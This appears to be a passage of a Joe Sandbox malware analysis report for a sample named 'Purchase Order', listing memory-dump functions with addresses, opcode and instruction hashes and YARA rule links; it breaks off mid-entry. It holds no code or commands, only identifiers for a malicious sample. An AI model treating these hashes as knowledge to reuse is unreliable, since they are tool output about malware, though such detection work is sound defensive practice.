                                                                                                            • Instruction ID: a35a2e1a5368cabac979a0112b0f9ecad0411b0c4f850cbc53574fd9aaa1e8ea
                                                                                                            • Opcode Fuzzy Hash: 52c93e4bb0fd317c4e95127d614b9cff6ed27be8ab62d0d27e63ada5634a6e6b
                                                                                                            • Instruction Fuzzy Hash: B441E074E02209CFCB04DFA9E5986EDBBF1EF48300F149129D815A7398EB785945CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01666790 Relevance: .1, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b49e30ee39de95e023747d788936af4e63f904c8a26534621fd081fcfa9ec691
                                                                                                            • Instruction ID: 4fb5bf453e2c644263af4dc49e2767f239e73770155c73a242f51e7b5523706a
                                                                                                            • Opcode Fuzzy Hash: b49e30ee39de95e023747d788936af4e63f904c8a26534621fd081fcfa9ec691
                                                                                                            • Instruction Fuzzy Hash: D341B171A00208DFCB11DF68D904BAA7BFAEB84300F05846EE91597351DB78DD45DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E99A58 Relevance: .1, Instructions: 111COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce766930bc5bb0ca897d7506d80d8aaa26242aa60f9cdf383074171bcaa5f6ff
                                                                                                            • Instruction ID: 2d3adb71899abfa5246d84fb2b97aa29772c251d9e84458c1fe1a026b261d31b
                                                                                                            • Opcode Fuzzy Hash: ce766930bc5bb0ca897d7506d80d8aaa26242aa60f9cdf383074171bcaa5f6ff
                                                                                                            • Instruction Fuzzy Hash: FB41C074E02209CFDB44DFA9E5946DDBBF2FF48300F149129D805A72A8EB785A46CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9FBD9 Relevance: .1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e25bdf07204195d0e9f23924a1c73d1c810482521c5538161bc65c6f389db1b4
                                                                                                            • Instruction ID: 9ac8272f85a427e5e572b53bdfa748158229944aa7cfebd93f59ce5a3f42271e
                                                                                                            • Opcode Fuzzy Hash: e25bdf07204195d0e9f23924a1c73d1c810482521c5538161bc65c6f389db1b4
                                                                                                            • Instruction Fuzzy Hash: 8A318035E013198BDF19EF75D8546AE7BB2AF89210F14443AD906EB354DF348941CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01664E20 Relevance: .1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 338c7678f97deb94f39b99b954f2ccf29e2592e7ec0236175732a0f1d9a5f25a
                                                                                                            • Instruction ID: 26ba50194db957a95ca4b89ad53c184303af88a00017fe5258b8f19a507a06c4
                                                                                                            • Opcode Fuzzy Hash: 338c7678f97deb94f39b99b954f2ccf29e2592e7ec0236175732a0f1d9a5f25a
                                                                                                            • Instruction Fuzzy Hash: 8A31723170520AAFCF069F69D848AAE3BE6FB98311F004029F90587355CF39DD61DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E991E8 Relevance: .1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23d8b6b35b52090e7796f1432ddf2163d5ee5c0d2d64ca09e2a95a3a0c2ae6df
                                                                                                            • Instruction ID: db6cd95786f4aac869c6fd16dfd755d3cdb8bd34483e74eaad7388541f0009f2
                                                                                                            • Opcode Fuzzy Hash: 23d8b6b35b52090e7796f1432ddf2163d5ee5c0d2d64ca09e2a95a3a0c2ae6df
                                                                                                            • Instruction Fuzzy Hash: CC3101B2808359CFDB11CF9AC845ADABFF4EF56314F09548BD154AB262C3789544CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9FC0F Relevance: .1, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30aabce3e5d81f147e2c6fc282a6ad84b5db49e1e7f2d0e3a84441200db16f0b
                                                                                                            • Instruction ID: 31d7f89fe3c95b0351e0b7dda64a39adc6d842c01db45b2bf2850763daeb4bb2
                                                                                                            • Opcode Fuzzy Hash: 30aabce3e5d81f147e2c6fc282a6ad84b5db49e1e7f2d0e3a84441200db16f0b
                                                                                                            • Instruction Fuzzy Hash: 04317E35E0130A8BDF59EFB4D9546AD7BB3AF89210F148429D902EB354DF349942CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01667740 Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9aa653332cdfd836a0418d444acee86fbcdbc390d542f47835780f7f29fc37e3
                                                                                                            • Instruction ID: 0a080959785004d7c1689d9d964a7ed6fd9c42f7a7a79e596557132d5465f660
                                                                                                            • Opcode Fuzzy Hash: 9aa653332cdfd836a0418d444acee86fbcdbc390d542f47835780f7f29fc37e3
                                                                                                            • Instruction Fuzzy Hash: FC2183347012018BDB161A2D9C94A7E369FAFC861DF15403DD906CB399DF69CC42E7C1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166A869 Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d3ea99923760361981bb11a791d9b100c39a7ecfdcf1ef10a93bd0b88bb8a55
                                                                                                            • Instruction ID: 84fce778bc8f2ee6270d107a68f2bd40bf9c7a0f1c65b80200ce0be3f811b25d
                                                                                                            • Opcode Fuzzy Hash: 0d3ea99923760361981bb11a791d9b100c39a7ecfdcf1ef10a93bd0b88bb8a55
                                                                                                            • Instruction Fuzzy Hash: 08317574A105058FCB04DFA9CC849AEBBFAFF85710B258259E515A73A6DB34ED02CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 016620B8 Relevance: .1, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a05a303484a36e43445d6eac693a36a1d6398815921aadc07daceadd600995d
                                                                                                            • Instruction ID: 04f2d784a40c6fd98cfd876fca1fddb9de60dbb7e1e2cbf4ec2452d29546859f
                                                                                                            • Opcode Fuzzy Hash: 1a05a303484a36e43445d6eac693a36a1d6398815921aadc07daceadd600995d
                                                                                                            • Instruction Fuzzy Hash: 9421A435A00116EFCF15DF28D8509AEB7A9EBC9350B50C05EE9099B354DB34EE46CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0148D006 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124137961.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_148d000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 32efeee3876efec76fa16f74b7b415dce5dadde3843fd840b33c703370e64ff1
                                                                                                            • Instruction ID: df8237674ec8935925dda067e4d14e9b1e09dea5ed0e8e63b89d84c2b077d8ed
                                                                                                            • Opcode Fuzzy Hash: 32efeee3876efec76fa16f74b7b415dce5dadde3843fd840b33c703370e64ff1
                                                                                                            • Instruction Fuzzy Hash: B331297550E7C08FDB038B64C990715BF71AF47214F2985DBD8888F2A3C23A984ACB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01665AC8 Relevance: .1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db56f78e1bf8a6d782a8e6a06b0aa37625c97264399b43fab7bbc8616fa2a786
                                                                                                            • Instruction ID: 371149bff5255234815dd7ea7e1a809dcd4f361e7d1e10ee98348992344d8dc8
                                                                                                            • Opcode Fuzzy Hash: db56f78e1bf8a6d782a8e6a06b0aa37625c97264399b43fab7bbc8616fa2a786
                                                                                                            • Instruction Fuzzy Hash: CF21C3357016129FC7299E69D86892AB7D6FFC86A17044169E907CB358CF34DC028BC0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0148D044 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124137961.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_148d000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 515be0e442578d358b26a69601dc34a5301185776b1c26445c64092bdac2b6c0
                                                                                                            • Instruction ID: 38eec12eecdb9455c2e140ebe0f3041c8b4023a5dff4b0c0803bc3a4c39140bf
                                                                                                            • Opcode Fuzzy Hash: 515be0e442578d358b26a69601dc34a5301185776b1c26445c64092bdac2b6c0
                                                                                                            • Instruction Fuzzy Hash: 132137B1905204EFCB15EF58C9C0B2ABB65FB85318F20C96EE9494B3A2C736D447CA61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9DCE8 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bba8604cb2c8653f948e3164caf170449f4fe4ae57e2dbd69e5f1ed8efe6978f
                                                                                                            • Instruction ID: 7e3b1e6725d271ed5da09a90e545a860246b6c23a30d40956f1fbb705fc91a95
                                                                                                            • Opcode Fuzzy Hash: bba8604cb2c8653f948e3164caf170449f4fe4ae57e2dbd69e5f1ed8efe6978f
                                                                                                            • Instruction Fuzzy Hash: 99117C7051630ACFD3106BB4E11C6BE7EB1EB8B312F006C989606572ECCF740900DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01664E11 Relevance: .1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13652ba5474dfec740b99f2d4858c807e3628f94529f2e488291dcc689b45f4d
                                                                                                            • Instruction ID: 3acc284417f05032f1dd5d81617e61cec477907f22a8ee5570cb56075652adf4
                                                                                                            • Opcode Fuzzy Hash: 13652ba5474dfec740b99f2d4858c807e3628f94529f2e488291dcc689b45f4d
                                                                                                            • Instruction Fuzzy Hash: CC2190357092099FCB15AE68EC4876A3BEAFB98711F004029F9058B355CF38DD55DBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E996F0 Relevance: .1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3a9eb61d638227dc6025308bc4878530a8e9bd417de126720b4bcbd33525eae0
                                                                                                            • Instruction ID: 79c466d79cc3f47a6a327626728732b9a68f3c1155112308652497e90434c2b8
                                                                                                            • Opcode Fuzzy Hash: 3a9eb61d638227dc6025308bc4878530a8e9bd417de126720b4bcbd33525eae0
                                                                                                            • Instruction Fuzzy Hash: 681104367042950FCF8AAFB898651AF3FA3AFC8250B04446BD506C7391CE384E0287A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01661FB8 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 556111a5a4462bea8cc73d5c477f3be973318c9caa80eff5e74235778ec6f472
                                                                                                            • Instruction ID: 82adccad42ffcba64638484335e6a7acc228c93be65458104e220e6d5c113a31
                                                                                                            • Opcode Fuzzy Hash: 556111a5a4462bea8cc73d5c477f3be973318c9caa80eff5e74235778ec6f472
                                                                                                            • Instruction Fuzzy Hash: 1321EF74C0120A8FCB40EFA8D9455EEBBF0FB49310F10916AD805B3224EB345A95CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9DDE1 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e4164598632d357692599f17fcc833c449a6eeb7ffc54bb85edeb8cf659d1f24
                                                                                                            • Instruction ID: af890282fe89dd2d4a68db16a5113ddac2e852ec40ccaf4673b422e6f5c529c5
                                                                                                            • Opcode Fuzzy Hash: e4164598632d357692599f17fcc833c449a6eeb7ffc54bb85edeb8cf659d1f24
                                                                                                            • Instruction Fuzzy Hash: 2101DD34B062545FDB051ABA6C545BFEFDBAFD9351B14C477E606C3295CD388C0582B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166DBD8 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d49dcabcdd81c65ee8e8074dfd292d96076ba631e4c6058c75429e9c4c9ddbd
                                                                                                            • Instruction ID: 780a3471282a7c8af932c55920ad5a32b08ad34e5998da18de2b0dfda1b383e7
                                                                                                            • Opcode Fuzzy Hash: 9d49dcabcdd81c65ee8e8074dfd292d96076ba631e4c6058c75429e9c4c9ddbd
                                                                                                            • Instruction Fuzzy Hash: 20211AB0A0010A9FDB44EFADD58479EBBF2FB44300F04D56AD408AB365EB749A85DB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E991D8 Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7fec853dd06bbd7f49206bb2ab0137ae327974436fbd644d95bdfc354e212c2e
                                                                                                            • Instruction ID: 6df456e51978221ce52f44add0a8f869c1961886636b80db7fd4fc9f169c8cc7
                                                                                                            • Opcode Fuzzy Hash: 7fec853dd06bbd7f49206bb2ab0137ae327974436fbd644d95bdfc354e212c2e
                                                                                                            • Instruction Fuzzy Hash: 841112B68003499FDF20CF99C945BEEBBF5EF48324F14841AE918A7211C379A950DFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E98EC1 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 834d830e9c60d50ccdf3a7f443ede757c748349b456e4cbe3866ef90f23a2125
                                                                                                            • Instruction ID: 06b814950bbe94b4aafc27266d219cc5da91cfbf19b947b2f37e11b5d3d2e3a3
                                                                                                            • Opcode Fuzzy Hash: 834d830e9c60d50ccdf3a7f443ede757c748349b456e4cbe3866ef90f23a2125
                                                                                                            • Instruction Fuzzy Hash: 96110078F002498FDF40DFE8D950BDEBBB2EF49315F10A455E908A7355E73099828B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166DBE8 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 834ef1f0a50fbf8105b211c9b3018700510e0e5cd5072e887da99f92e60d9cde
                                                                                                            • Instruction ID: ac6bc82025146fbdbf6235aa8415befe62b784a74eb72becd8968832ad14f9cd
                                                                                                            • Opcode Fuzzy Hash: 834ef1f0a50fbf8105b211c9b3018700510e0e5cd5072e887da99f92e60d9cde
                                                                                                            • Instruction Fuzzy Hash: BF114FB0E0020A9FDB44EFADD54469EBBF1FB44300F00D569D004AB365EB745A85DB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9DCE1 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7640de6a88aa60d4d86ba978df70ebe82183fee0e96f2ca75c990de493a192e1
                                                                                                            • Instruction ID: 57c547d2ac632905e7d13896d3a265d21b20e061c19f08b5abef1f9158c1b8f0
                                                                                                            • Opcode Fuzzy Hash: 7640de6a88aa60d4d86ba978df70ebe82183fee0e96f2ca75c990de493a192e1
                                                                                                            • Instruction Fuzzy Hash: C5016D70942309DFD750ABB4E11C7BE7FB1EB4B312F006959D505532A8CB740A40CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166565F Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6311c7dfb6e0e9f42e562cb0c62d049ba221aa996aa70745471267d4da857bde
                                                                                                            • Instruction ID: 9c1b9889ab8c6a2db145eeae4be690069a1d57230d21a5c7c69ec17bad077651
                                                                                                            • Opcode Fuzzy Hash: 6311c7dfb6e0e9f42e562cb0c62d049ba221aa996aa70745471267d4da857bde
                                                                                                            • Instruction Fuzzy Hash: 5D01D2727012596FCB029E69DC00AEF3BEADBD8690B14802AF916C7354CB758D16DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E99999 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2d8776019dcd5d071d745f328d3364ba3b4cf65383407c654dac8731cbe419a
                                                                                                            • Instruction ID: 2cfdd3cbee307a6e0b533287cdc94fc4b095b61558ade5efb9a5ff04e6df9bf6
                                                                                                            • Opcode Fuzzy Hash: e2d8776019dcd5d071d745f328d3364ba3b4cf65383407c654dac8731cbe419a
                                                                                                            • Instruction Fuzzy Hash: 9D1112B6800249DFDB10CF99C945BDEBBF4EF48324F18841AE528A7291C379A554DFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E92670 Relevance: .1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 868c4c8c66022401bcb881128ecc37c802a0fb6eb72cc89bf021f55a11700c61
                                                                                                            • Instruction ID: fcb17f023466ac2f4c3ebf6068865ee9d35dcd0b1fc1848342a1e66eb4c7b23c
                                                                                                            • Opcode Fuzzy Hash: 868c4c8c66022401bcb881128ecc37c802a0fb6eb72cc89bf021f55a11700c61
                                                                                                            • Instruction Fuzzy Hash: 0F11C0B5B212228FCB94EF7CE50866E3BF1EF88611B0104A9E805DB315EB35CD05CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E925E8 Relevance: .0, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1099817f0134eec80127906cc4ded768b9ed0eeaac5fda268c5a0e52ef624124
                                                                                                            • Instruction ID: b1571b75738a3e7f0fa8984d8d8a67bff479cdae7e39c3008fa058218320a4e9
                                                                                                            • Opcode Fuzzy Hash: 1099817f0134eec80127906cc4ded768b9ed0eeaac5fda268c5a0e52ef624124
                                                                                                            • Instruction Fuzzy Hash: 3401E471E1031A9FCF48EFB988446EEBBF5BF48200F00816AD919E7254E7385A01CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E99760 Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ca887cf78ad2b18c3e043bf00e3d1f5bf7c072650148eeb3042b5d1b581ef1cf
                                                                                                            • Instruction ID: 89a749c63d5c3f634cc741cf0aae997772a36a12e90a94848463492c71691097
                                                                                                            • Opcode Fuzzy Hash: ca887cf78ad2b18c3e043bf00e3d1f5bf7c072650148eeb3042b5d1b581ef1cf
                                                                                                            • Instruction Fuzzy Hash: C8F089373002196FCF055E999C419EF7BABFFC8250B40442EFA05C7351DE31491557A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01662068 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
